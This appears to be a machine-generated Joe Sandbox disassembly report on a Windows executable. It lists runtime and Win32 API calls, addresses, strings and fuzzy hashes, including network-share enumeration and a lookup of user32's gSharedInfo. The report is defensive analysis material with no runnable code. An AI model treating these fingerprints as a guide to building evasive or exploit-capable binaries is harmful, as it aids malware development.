                                                                                                                            • API String ID: 4202395251-3574835850
                                                                                                                            APIs
                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 0041E960
                                                                                                                            • DefWindowProcW.USER32(?,00000111,?,?), ref: 0041E991
                                                                                                                            • BeginPaint.USER32(?,?), ref: 0041E9F5
                                                                                                                            • EndPaint.USER32(?,?), ref: 0041EA01
                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 0041EA1D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PaintProcWindow$BeginMessagePostQuit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3181456275-0
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00436FA8,00000008,00427551,00000000,00000000,?,?,00425712,0042402B,?,?,00423F47,?,?,00401021), ref: 0042745A
                                                                                                                            • __lock.LIBCMT ref: 0042748E
                                                                                                                              • Part of subcall function 0042A4BB: __mtinitlocknum.LIBCMT ref: 0042A4D1
                                                                                                                              • Part of subcall function 0042A4BB: __amsg_exit.LIBCMT ref: 0042A4DD
                                                                                                                              • Part of subcall function 0042A4BB: EnterCriticalSection.KERNEL32(00000000,00000000,?,00427493,0000000D), ref: 0042A4E5
                                                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 0042749B
                                                                                                                            • __lock.LIBCMT ref: 004274AF
                                                                                                                            • ___addlocaleref.LIBCMT ref: 004274CD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                            • String ID: KERNEL32.DLL
                                                                                                                            • API String ID: 637971194-2576044830
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 0042F1C2
                                                                                                                              • Part of subcall function 00427576: __getptd_noexit.LIBCMT ref: 00427579
                                                                                                                              • Part of subcall function 00427576: __amsg_exit.LIBCMT ref: 00427586
                                                                                                                            • __getptd.LIBCMT ref: 0042F1D3
                                                                                                                            • __getptd.LIBCMT ref: 0042F1E1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                            • String ID: MOC$RCC$csm
                                                                                                                            • API String ID: 803148776-2671469338
                                                                                                                            APIs
                                                                                                                            • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00413692
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00004000), ref: 004136AB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocEnumGlobalOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3336353811-0
                                                                                                                            APIs
                                                                                                                            • __CreateFrameInfo.LIBCMT ref: 0042F476
                                                                                                                              • Part of subcall function 0042F00B: __getptd.LIBCMT ref: 0042F019
                                                                                                                              • Part of subcall function 0042F00B: __getptd.LIBCMT ref: 0042F027
                                                                                                                            • __getptd.LIBCMT ref: 0042F480
                                                                                                                              • Part of subcall function 00427576: __getptd_noexit.LIBCMT ref: 00427579
                                                                                                                              • Part of subcall function 00427576: __amsg_exit.LIBCMT ref: 00427586
                                                                                                                            • __getptd.LIBCMT ref: 0042F48E
                                                                                                                            • __getptd.LIBCMT ref: 0042F49C
                                                                                                                            • __getptd.LIBCMT ref: 0042F4A7
                                                                                                                            • _CallCatchBlock2.LIBCMT ref: 0042F4CD
                                                                                                                              • Part of subcall function 0042F0B0: __CallSettingFrame@12.LIBCMT ref: 0042F0FC
                                                                                                                              • Part of subcall function 0042F574: __getptd.LIBCMT ref: 0042F583
                                                                                                                              • Part of subcall function 0042F574: __getptd.LIBCMT ref: 0042F591
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1602911419-0
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 00426BD8
                                                                                                                              • Part of subcall function 00427576: __getptd_noexit.LIBCMT ref: 00427579
                                                                                                                              • Part of subcall function 00427576: __amsg_exit.LIBCMT ref: 00427586
                                                                                                                            • __amsg_exit.LIBCMT ref: 00426BF8
                                                                                                                            • __lock.LIBCMT ref: 00426C08
                                                                                                                            • InterlockedDecrement.KERNEL32(?,00436F48,0000000C,00424569,?,?,0042BD49), ref: 00426C25
                                                                                                                            • _free.LIBCMT ref: 00426C38
                                                                                                                            • InterlockedIncrement.KERNEL32(00142BA0,00436F48,0000000C,00424569,?,?,0042BD49), ref: 00426C50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3470314060-0
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402C3A
                                                                                                                              • Part of subcall function 00423E37: std::exception::exception.LIBCMT ref: 00423E4C
                                                                                                                              • Part of subcall function 00423E37: __CxxThrowException@8.LIBCMT ref: 00423E61
                                                                                                                              • Part of subcall function 00423E37: std::exception::exception.LIBCMT ref: 00423E72
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402C71
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423DFF
                                                                                                                              • Part of subcall function 00423DEA: __CxxThrowException@8.LIBCMT ref: 00423E14
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423E25
                                                                                                                            • _memmove.LIBCMT ref: 00402CD1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 1615890066-4289949731
                                                                                                                            • Opcode ID: 9b79f654a2debf70a313bb16433d7a314f380207c4e6c539a90a7358e1487792
                                                                                                                            • Instruction ID: f380dc011fae16a05292a652e213d1f5969693d70e6bdf194ed0e62b7d50edb5
                                                                                                                            • Opcode Fuzzy Hash: 9b79f654a2debf70a313bb16433d7a314f380207c4e6c539a90a7358e1487792
                                                                                                                            • Instruction Fuzzy Hash: F82109333042105BD7209E6CE984A6EF799EBA1365B20093FF041DB2C1C6F9D94483A8
                                                                                                                            APIs
                                                                                                                            • ___BuildCatchObject.LIBCMT ref: 0042F80E
                                                                                                                              • Part of subcall function 0042F769: ___BuildCatchObjectHelper.LIBCMT ref: 0042F79F
                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 0042F825
                                                                                                                            • ___FrameUnwindToState.LIBCMT ref: 0042F833
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 2163707966-3733052814
                                                                                                                            • Opcode ID: 4a61a2d52b0bc3a74fdd56ea7b2520c29e380175ca527c9f51821e9418d154e1
                                                                                                                            • Instruction ID: 35c86a7ea48db691c2fae8fb970ae395304450bfd9a7a45420d77627640d1373
                                                                                                                            • Opcode Fuzzy Hash: 4a61a2d52b0bc3a74fdd56ea7b2520c29e380175ca527c9f51821e9418d154e1
                                                                                                                            • Instruction Fuzzy Hash: AE01283110012ABBDF126F52EC45EAB7E7AEF08354F804036BD1815121DB7A98B5DBA9
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 00425279
                                                                                                                              • Part of subcall function 00424B82: __FF_MSGBANNER.LIBCMT ref: 00424B9B
                                                                                                                              • Part of subcall function 00424B82: __NMSG_WRITE.LIBCMT ref: 00424BA2
                                                                                                                              • Part of subcall function 00424B82: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0042BB22,00000000,00000001,00000000,?,0042A446,00000018,00437060,0000000C,0042A4D6), ref: 00424BC7
                                                                                                                            • _free.LIBCMT ref: 0042528C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocHeap_free_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2734353464-0
                                                                                                                            • Opcode ID: c6bdd99ffc9e723cbfbee10e3b90331d8409d7047ee641f11f80580ace6a14e1
                                                                                                                            • Instruction ID: 303440cbd639b63c9e0f56f25b27bf7b376566829b2ef2b6ba667a5b39b707a4
                                                                                                                            • Opcode Fuzzy Hash: c6bdd99ffc9e723cbfbee10e3b90331d8409d7047ee641f11f80580ace6a14e1
                                                                                                                            • Instruction Fuzzy Hash: C011AE32704E35D7CB212B75BC0565A37949F403B5FA1416BF9489A2D1DF3DD8418EAC
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 00427359
                                                                                                                              • Part of subcall function 00427576: __getptd_noexit.LIBCMT ref: 00427579
                                                                                                                              • Part of subcall function 00427576: __amsg_exit.LIBCMT ref: 00427586
                                                                                                                            • __getptd.LIBCMT ref: 00427370
                                                                                                                            • __amsg_exit.LIBCMT ref: 0042737E
                                                                                                                            • __lock.LIBCMT ref: 0042738E
                                                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 004273A2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 938513278-0
                                                                                                                            • Opcode ID: 54c2f71e7f4421a5e04ae7c57690b572abebdbd578d104f1fdc764d6efdd8cb8
                                                                                                                            • Instruction ID: 4e945a9602c2599bfda43b3e09900f0a81e55d254053af84444372c591fc76f4
                                                                                                                            • Opcode Fuzzy Hash: 54c2f71e7f4421a5e04ae7c57690b572abebdbd578d104f1fdc764d6efdd8cb8
                                                                                                                            • Instruction Fuzzy Hash: 4BF06231B49630DBD711FB657807B5962909F00728FA1418FFC44672D2DB7C5841DA5E
                                                                                                                            APIs
                                                                                                                            • std::exception::exception.LIBCMT ref: 00401116
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040112B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8Throwstd::exception::exception
                                                                                                                            • String ID: NULL$4C
                                                                                                                            • API String ID: 3728558374-1282692239
                                                                                                                            • Opcode ID: 33808c3854b2259bcd7a82078fa9c6c209a995163827107ddf829d201c8a9eac
                                                                                                                            • Instruction ID: b3ae1bd3d58b088f2b380a9d5d3b1efe849a21ab515698cc0b20f447eb10873f
                                                                                                                            • Opcode Fuzzy Hash: 33808c3854b2259bcd7a82078fa9c6c209a995163827107ddf829d201c8a9eac
                                                                                                                            • Instruction Fuzzy Hash: 41115C71E00219ABCB14DFA9E841A9EBBB4EB08714F50852FE921B7281DB785604CB98
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(user32.dll,0041ECE4,000000FC,774E267D), ref: 0041EBE5
                                                                                                                            • GetProcAddress.KERNEL32(00000000,gSharedInfo), ref: 0041EBF8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: gSharedInfo$user32.dll
                                                                                                                            • API String ID: 1646373207-999560209
                                                                                                                            • Opcode ID: 7608db308a29dce760263480e7203b5d3808d5ed795dd706531d16fa86081a39
                                                                                                                            • Instruction ID: ae76247dc9f31e7de8133061f811e50f9bb29006db9acc4deabd45f6b953e967
                                                                                                                            • Opcode Fuzzy Hash: 7608db308a29dce760263480e7203b5d3808d5ed795dd706531d16fa86081a39
                                                                                                                            • Instruction Fuzzy Hash: C801D6353042129EDB148B2EEC04AA777A5AF80711719847BD401CB265E739FCC2C798
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9f84d886e4d42a19a87c36e5102503476a3af5eb5526c693e44d88414bddffad
                                                                                                                            • Instruction ID: 2a6b1f398474c41a725a352b1772b0aa02fa5464a8478bab27030f1f99605548
                                                                                                                            • Opcode Fuzzy Hash: 9f84d886e4d42a19a87c36e5102503476a3af5eb5526c693e44d88414bddffad
                                                                                                                            • Instruction Fuzzy Hash: D5E15EB5A00109AFDB04DF68DC95EEF77BAEF88304F14812DF905A7346D634AE518BA4
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2102423945-0
                                                                                                                            • Opcode ID: 27d1509f28c13e3860b7557a938103522342b77dac943ab4e707e1a7e5d684ef
                                                                                                                            • Instruction ID: 0453099c714d3fd7adfcecacc1872658beb67ade4667a523255af1f974051419
                                                                                                                            • Opcode Fuzzy Hash: 27d1509f28c13e3860b7557a938103522342b77dac943ab4e707e1a7e5d684ef
                                                                                                                            • Instruction Fuzzy Hash: 70E1A1B5A00109ABDB10DF58DC81EEF77B9EF88308F14802AF90597341E675EE95CBA5
                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042BC3A
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 0042BC6D
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,004240F7,?,00000000,00000000,?,?,?,?,004240F7,00000000), ref: 0042BC9E
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,004240F7,00000001,00000000,00000000,?,?,?,?,004240F7,00000000), ref: 0042BD0C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1357608183-0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1357608183-0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1357608183-0
                                                                                                                            APIs
                                                                                                                            • GetTickCount.KERNEL32 ref: 0041B830
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0041B84C
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0041B853
                                                                                                                            • GlobalMemoryStatus.KERNEL32(?), ref: 0041B866
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 0041B8A5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCountCurrentFreeGlobalHandleLibraryMemoryProcessStatusTick
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3344549487-0
                                                                                                                            APIs
                                                                                                                            • GetEnvironmentStringsW.KERNEL32(00000000,00425433), ref: 0042AE2F
                                                                                                                            • __malloc_crt.LIBCMT ref: 0042AE5E
                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042AE6B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                            • String ID:
